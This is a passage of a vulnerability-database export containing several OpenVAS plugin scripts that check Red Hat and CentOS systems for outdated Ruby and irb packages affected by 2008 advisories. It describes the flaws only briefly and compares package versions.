"OPENVAS:1361412562310870086", "type": "openvas", "title": "RedHat Update for ruby RHSA-2008:0895-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2008:0895-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux AS (Advanced Server) version 2.1,\n Red Hat Enterprise Linux ES version 2.1,\n Red Hat Enterprise Linux WS version 2.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-October/msg00010.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870086\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2008:0895-02\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\");\n script_name( \"RedHat Update for ruby RHSA-2008:0895-02\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_2.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:15", "bulletinFamily": "scanner", "description": "Check for the Version of irb", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880056", "id": "OPENVAS:880056", "title": "CentOS Update for irb CESA-2008:0896 centos3 x86_64", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0896 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"irb on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015333.html\");\n script_id(880056);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0896\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_name( \"CentOS Update for irb CESA-2008:0896 centos3 x86_64\");\n\n script_summary(\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:56:40", "bulletinFamily": "scanner", "description": "Check for the Version of ruby", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870065", "id": "OPENVAS:870065", "title": "RedHat Update for ruby RHSA-2008:0896-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2008:0896-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux WS version 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-October/msg00011.html\");\n script_id(870065);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2008:0896-01\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_name( \"RedHat Update for ruby RHSA-2008:0896-01\");\n\n script_summary(\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:03", "bulletinFamily": "scanner", "description": "Check for the Version of irb", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880190", "id": "OPENVAS:880190", "title": "CentOS Update for irb CESA-2008:0896 centos3 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0896 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"irb on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015332.html\");\n script_id(880190);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0896\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_name( \"CentOS Update for irb CESA-2008:0896 centos3 i386\");\n\n script_summary(\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:21", "bulletinFamily": "scanner", "description": "Check for the Version of ruby", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870065", "id": "OPENVAS:1361412562310870065", "type": "openvas", "title": "RedHat Update for ruby RHSA-2008:0896-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2008:0896-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux WS version 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-October/msg00011.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870065\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2008:0896-01\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_name( \"RedHat Update for ruby RHSA-2008:0896-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:54", "bulletinFamily": "scanner", "description": "Check for the Version of irb", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880056", "id": "OPENVAS:1361412562310880056", "type": "openvas", "title": "CentOS Update for irb CESA-2008:0896 centos3 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0896 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"irb on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015333.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880056\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0896\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_name( \"CentOS Update for irb CESA-2008:0896 centos3 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", 